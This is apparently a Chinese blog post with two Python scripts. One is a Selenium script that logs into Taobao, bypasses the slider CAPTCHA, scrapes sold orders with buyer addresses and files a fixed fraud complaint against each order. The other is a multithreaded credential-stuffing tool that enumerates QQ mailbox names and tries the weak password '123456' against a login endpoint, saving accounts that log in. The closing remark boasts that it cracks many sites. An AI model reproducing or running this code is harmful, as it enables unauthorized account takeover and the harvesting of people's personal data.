爬虫之类的东西:
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from lxml import etree
# Flat Selenium script (no functions): asks for a Taobao account and password,
# opens the Taobao login page, fills and submits the form through injected
# JavaScript, then parses the resulting page for orders and, for each order,
# opens a detail page and submits a form on guimi.taobao.com.
# NOTE(review): this copy has lost all indentation, so which statements sit
# inside the try/except/for bodies below cannot be read off the text - confirm
# against the original before running.
print('请输入账号:')
username=input()
print('请输入密码:')
# NOTE(review): the password is read with plain input(), same as the account name.
password=input()
# NOTE(review): the driver path looks like it lost its path separators - TODO confirm.
driver=webdriver.Chrome(r'E:pythonchromedriver.exe')
driver.maximize_window()
# Login page; the redirectURL query parameter points at the sold-items list.
driver.get('https://login.taobao.com/member/login.jhtml?redirectURL=http%3A%2F%2Ftrade.taobao.com%2Ftrade%2Fitemlist%2Flist_sold_items.htm%3Fspm%3Da313o.201708ban.category.d28.64f0197aAFB4S5%26mytmenu%3Dymbb'
)
# JavaScript that writes the account and password into form fields looked up
# by element id and clicks the submit element. The two values are spliced into
# the script text with str.format.
js="""
document.getElementById('TPL_username_1').value='{0}';
document.getElementById('password-label').value='{1}';
document.getElementById('J_SubmitStatic').click()
""".format(username,password)
driver.execute_script(js)
# Slider step: look up 'nc_1_scale_text', drag it by offset (400, 0), wait two
# seconds, then run the login JavaScript again.
try:
element=driver.find_elements_by_id('nc_1_scale_text')
ActionChains(driver).drag_and_drop_by_offset(element,400,0).perform()
time.sleep(2)
driver.execute_script(js)
# NOTE(review): bare except - every failure in the slider step ends up here.
except:
print('没有开挂')
pass
time.sleep(3)
print('开始开挂')
# Switch into the page's frame at index 0 before the element lookups below.
driver.switch_to.frame(0)
# Verification-code step: click the element with id 'J_GetCode', read a code
# typed by the operator, put it into 'J_Phone_Checkcode' and click 'submitBtn'.
# Any Exception raised here is printed and the script carries on.
try:
driver.find_element_by_id('J_GetCode').click()
print('请输入手机验证码')
x=input()
driver.find_element_by_id('J_Phone_Checkcode').send_keys(x)
driver.find_element_by_id('submitBtn').click()
except Exception as e:
print(e)
# Stop the current page load, pause three seconds, then reload the page.
driver.execute_script('window.stop()')
time.sleep(3)
driver.refresh()
# Wait up to 15 seconds for elements with id 'page' to be present.
try:
WebDriverWait(driver,15).until(EC.presence_of_all_elements_located((By.ID,'page')))
except:
print('over')
driver.execute_script("window.stop()")
# Parse the rendered page with lxml and select the per-order container nodes.
html=driver.page_source
selector=etree.HTML(html)
list1=selector.xpath('//div[contains(@class,"item-mod__trade-order")]')
# Per-order processing; the XPath expressions below are relative to each node.
try:
for i in list1:
order_id = i.xpath('table[1]/tbody/tr/td[1]/label/span[3]/text()')[0] # order number
order_time = i.xpath('table[1]/tbody/tr/td[1]/label/span[6]/text()')[0] # order time
price = i.xpath('table[2]/tbody/tr/td[2]/div/p/span[2]/text()')[0] # price
all_price = i.xpath('table[2]/tbody/tr/td[7]/div/div[1]/p/strong/span[2]/text()')[0] # total price
saler_title = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0] # product name
# NOTE(review): labelled as the buyer account name, but the XPath is identical
# to the one used for saler_title on the previous line.
name = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0] # buyer account name
url = i.xpath('table[2]/tbody/tr/td[6]/div/div/p[1]/a/@href')[0] # product detail URL
# Presumably the href is protocol-relative, hence the scheme prefix - TODO confirm.
url = 'https:' + url
driver.get(url)
time.sleep(3)
# Click the second list item's link in the detail panel, then read a span's
# text into `address`.
driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/ul/li[2]/a').click()
address=driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/div/div[2]/div/div/div[1]/div/span[2]/span').text
# NOTE(review): `address` is printed together with the order fields; if it is
# buyer personal data, confirm that collecting and printing it is permitted.
print(order_id,order_time,price,all_price,saler_title,name,address)
### Go to guimi and operate
# NOTE(review): if these steps are inside the loop, the same fixed remark is
# submitted for every order found on the page - confirm that is intended.
driver.get('http://guimi.taobao.com')
time.sleep(3)
driver.find_element_by_xpath('/html/body/div[3]/div/div/a[2]').click()
driver.find_element_by_xpath('//*[@id="J_Portal"]/div/div[1]/div[2]/a[1]').click()
time.sleep(3)
# Type the order number into the field with id 'order.0'.
driver.find_element_by_id('order.0').send_keys(order_id)
driver.find_element_by_xpath(
'//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div/button[4]').click()
time.sleep(1)
driver.find_element_by_xpath(
'//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div[2]/button').click()
time.sleep(1)
# Scroll the textarea into view before typing the fixed remark into it, then
# click the final button.
target = driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[3]/div[3]/div/div[3]/textarea')
driver.execute_script("arguments[0].scrollIntoView();", target)
target.send_keys('骗运费险的')
driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[4]/button').click()
except Exception as e:
# NOTE(review): this concatenates a str with the exception object `e`.
print('出错拉'+e)
# The browser is closed whether or not the block above raised.
finally:
driver.quit()
以上脚本利用 selenium 模块,通过自动化控制的 Chrome 浏览器自动登录淘宝并拖动滑块。
又因为想看老师的爬虫实战文章,被迫去网上寻找暴力破解密码的方法,找了很久终于找到了一篇靠谱的文章——https://blog.csdn.net/dwx1005526886/article/details/80642072
import hashlib
import json
import random
import socket
import threading
import time
from threading import Lock
import requests
# Starting value for the numeric mailbox prefix.
user_num_low = 111111111
# Upper limit: user_end_judge() reports the end once user_nbr exceeds this.
user_num_max = 9999999999
# Shared cursor holding the next numeric prefix; starts at the lower value.
user_nbr = user_num_low
# Lock acquired by the helper functions in this file around their use of user_nbr.
mutex=Lock()
# Build a user mailbox name.
# Returns the current value of the global user_nbr with '@qq.com' appended and
# then increments user_nbr by one, all while holding `mutex`.
# NOTE(review): Lock.acquire's first positional parameter is `blocking`, so the
# 3 passed here acts as a truthy flag, not as a timeout.
def get_user_nbr():
mutex.acquire(3)
global user_nbr
user_name = '%s%s' % (str(user_nbr), '@qq.com')
user_nbr = user_nbr + 1
mutex.release()
return user_name
# Report whether the shared cursor has passed the upper limit.
# Returns True when user_nbr > user_num_max, otherwise False; the comparison is
# made while holding `mutex`.
def user_end_judge():
mutex.acquire(3)
result = False
if user_nbr > user_num_max :
result = True
else:
result = False
mutex.release()
return result
# Return the mailbox name for the current value of user_nbr ('<number>@qq.com')
# without advancing the cursor; the read is made while holding `mutex`.
def get_curr_user():
mutex.acquire(3)
global user_nbr
user_name = '%s%s' % (str(user_nbr), '@qq.com')
mutex.release()
return user_name
#
# Pieces used by the check of whether a mailbox/password exists.
# Pool of User-Agent header strings; user_test() picks one at random per call.
user_agent = [
'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)',
'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'
]
# Append one record built from `user`, `pwd` and `desc` to the file "resut.txt"
# (opened in "a+" mode). All three arguments are joined with `+`, so they are
# expected to be strings. Returns nothing.
def save_pwd(user, pwd,desc):
with open("resut.txt","a+") as f:
f.write('user:'+ user + ' pwd:' + pwd + " desc:" + desc + '
')
# Send one login request for (username, password) to `url` and interpret the
# 'message' field of the JSON reply.
#   username: mailbox name placed in the 'email' form field.
#   password: fed to an MD5 object; the hex digest is placed in the 'password'
#             form field.
#   Returns False when the message contains '不存在', True otherwise on that
#   path (after recording the result through save_pwd); the later check returns
#   False when the message contains '错误'.
# NOTE(review): this routine submits guessed credentials for mailbox names that
# are generated elsewhere in this file. Running it against a service or against
# accounts without explicit authorization is unauthorized access; it is
# documented here as-is and no functional changes are proposed.
# NOTE(review): indentation is missing in this copy, so the extent of the
# try/if bodies, and whether the trailing check belongs to this function,
# cannot be read off the text - confirm against the original.
def user_test(username,password):
resp = ""
result = ""
url = "http://www.k*.htm"
pwd = password
user= username
md = hashlib.md5()
md.update(pwd)
password = md.hexdigest()
data = {'email':username,'password':password}
# Page encoding meant for decoding Chinese text in the reply; the variable is
# not referenced again in the visible code.
encoding = "gb18030"
# Build the HTTP request headers, choosing the User-Agent at random.
header = {
"User-Agent": random.choice(user_agent),
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With':'XMLHttpRequest'
}
# POST the form. Each except branch below sleeps 10 seconds and repeats the
# same POST once; the repeated call is not itself guarded.
try:
requests.adapters.DEFAULT_RETRIES = 5
resp = requests.post(url, data=data, headers=header, timeout=335)
except requests.exceptions.ReadTimeout:
print("1")
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except requests.exceptions.Timeout:
print("2")
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except requests.exceptions.ConnectionError:
print("3")
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except socket.error:
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
except BaseException as e:
print(e)
time.sleep(10)
resp = requests.post(url, data=data, headers=header, timeout=335)
resp.keep_alive = False
#print(resp.content)
# Decode the reply. The local name `json` bound here shadows the imported json
# module inside this function.
try:
result = resp.content
json = resp.json()
print('邮箱:%s ,result:%s
' % (username,result))
if (json['message'].find('不存在') > -1):
#print('邮箱:%s 为空' % username )
return False
else:
print('邮箱: %s 存在' % username)
save_pwd(username, password, json['message'])
return True
except BaseException as e:
print("发送错误 e: %s result:%s response code:%d" % (e, result, resp.status_code ))
# (Article commentary) Once a mailbox is known to exist, the next step is to
# check whether the password is accepted; the article remarks that weak
# passwords are common.
#
# The password check is one more test on the reply message, made after the
# mailbox-existence check.
if(json['message'].find('错误') > -1):
print("邮箱: %s 密码: %s ,密码错误!" % (username,pwd))
return False
else:
print('邮箱: %s 密码: %s ,登陆成功!' % (username, pwd))
# (Article commentary) Checking many user/password pairs on a single thread
# takes a long time, so the work is spread over several threads.
# Worker loop: while user_end_judge() is False, take the next mailbox name from
# get_user_nbr() and call user_test() with the fixed password '123456'; the
# loop stops when user_test() returns a truthy value. Exceptions are printed
# and the loop continues.
# NOTE(review): must not be run against accounts or services without explicit
# authorization; documented as-is with no functional changes.
def thread_bru(): # worker thread function
#while not user_end_judge():pwd_queue.empty()
while not user_end_judge():
try:
pwd = '123456'
user = get_user_nbr()
#print pwd_test
#if user_test(user, pwd_test):
if user_test(user, pwd):
result = pwd
print ('破解 %s 成功,密码为: %s' % (user, pwd))
break
except BaseException as e:
print("破解子线程错误: %s" % e)
# Start `threads` worker threads running thread_bru, then print a progress line
# every two seconds until user_end_judge() returns True.
#   threads:   number of worker threads to start.
#   pwd_queue: object whose qsize() is printed as the progress value; defaults
#              to None.
# NOTE(review): must not be run against accounts or services without explicit
# authorization; documented as-is with no functional changes.
def brute(threads, pwd_queue=None):
for i in range(threads):
t = threading.Thread(target=thread_bru)
t.start()
print('破解线程-->%s 启动' % t.ident)
while (not user_end_judge()): # check whether candidates remain
print('
进度: 当前值 %d' % pwd_queue.qsize())
time.sleep(2)
#print('
破解完毕')
# Script entry point: calls brute() with 150 worker threads and no pwd_queue.
if __name__ == "__main__":
brute(150)
运行之后发现并不能破解博客园的密码,不过很多其他网站的密码就可以被破解